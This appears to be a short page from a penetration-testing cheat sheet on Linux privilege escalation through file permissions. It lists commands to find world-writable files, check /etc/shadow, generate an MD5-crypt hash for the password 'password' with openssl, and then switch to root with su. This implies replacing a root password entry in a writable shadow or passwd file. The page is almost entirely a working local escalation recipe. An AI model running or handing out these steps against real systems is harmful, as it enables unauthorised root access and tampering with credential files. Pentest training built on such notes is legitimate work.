3️⃣3⃣ 3⃣ Permissions
Search for world writable files
find / -not -type l -perm -o+w 2>/dev/null
ls -l /etc/shadow
Generate a hash for password "password"
openssl passwd -1 -salt abc password
Escalate to root
su
<enter the new password>
Last updated
Was this helpful?